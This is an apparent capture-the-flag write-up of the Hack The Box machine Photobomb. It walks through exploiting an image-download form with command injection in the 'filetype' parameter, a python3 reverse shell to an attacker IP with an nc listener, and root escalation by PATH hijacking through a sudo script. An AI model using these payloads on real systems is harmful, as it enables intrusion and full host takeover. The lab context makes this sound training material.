Photobomb HTB writeup
Posted on Sat 11 February 2023 in hackthebox
This is a writeup of the machine Photobomb from Hack The Box.
As with all the machines on Hack The Box we start by performing an nmap scan against the machine: nmap -sC -sV -oA nmap/photobomb 10.10.11.182
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 12:57 EST
Nmap scan report for 10.10.11.182
Host is up (0.028s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e22473bbfbdf5cb520b66876748ab58d (RSA)
| 256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA)
|_ 256 20e05d8cba71f08c3a1819f24011d29e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.46 seconds
We see only two open ports.
SSH on port 22 probably won't be vulnerable so we have a more in depth look at HTTP on port 80.
There we see nginx running that wants to redirect to http://photobomb.htb/.
For this reason we add the following entry to /etc/hosts:
10.10.11.182 photobomb.htb
Printer
http://photobomb.htb/printer asks for creds so we have a look at the source.
function init() {
// Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');
}
}
window.onload = init;
We see that we can login with user pH0t0 and password b0Mb!.
We are presented with a webpage where we can select a photo a file type and a size in pixel.
If we intercept the download request with burp we can try to inject a bash command into one of the parameters.
For this we start a local web server to watch for a request from our victim with python3 -m http.server.
photo=kevin-charit-XZoaTJTnB9U-unsplash.jpg;curl 10.10.14.13:8000&filetype=jpg&dimensions=1x1
photo=kevin-charit-XZoaTJTnB9U-unsplash.jpg&filetype=jpg&dimensions=1x1;curl 10.10.14.13:8000
photo=kevin-charit-XZoaTJTnB9U-unsplash.jpg&filetype=jpg;curl 10.10.14.13:8000&dimensions=1x1
The parameter filetype is vulnerable so we try to get a reverse shell.
Reverse shell
We this we first start a listener with nc -lvnp 9001.
Than we use a python3 reverse shell:
photo=kevin-charit-XZoaTJTnB9U-unsplash.jpg&filetype=jpg;python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.13",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/sh")'&dimensions=1x1
User flag
With this reverse shell we can read the user flag:
/home/wizard/user.txt
0a8c193770e8af1131b8c7b8bcebe3e2
Priviledge escalation
Now let's see whether wizard is allowed to run any commands as sudo without providing as password by executing sudo -l.
And that indeed is the case.
sudo -l
Matching Defaults entries for wizard on photobomb:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wizard may run the following commands on photobomb:
(root) SETENV: NOPASSWD: /opt/cleanup.sh
So let's see what /opt/cleanup.sh does:
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
The script uses find directly from PATH. So if we overwrite path we can create a local script called find and provide it in the PATH variable.
Then we can run /opt/cleanup.sh with sudo to gain a shell: sudo PATH=.:$PATH /opt/cleanup.sh
Root flag
And with our newly gained root shell we can read the root flag:
cat /root/root.txt
3f690bc578906f2e2b602db972314a9b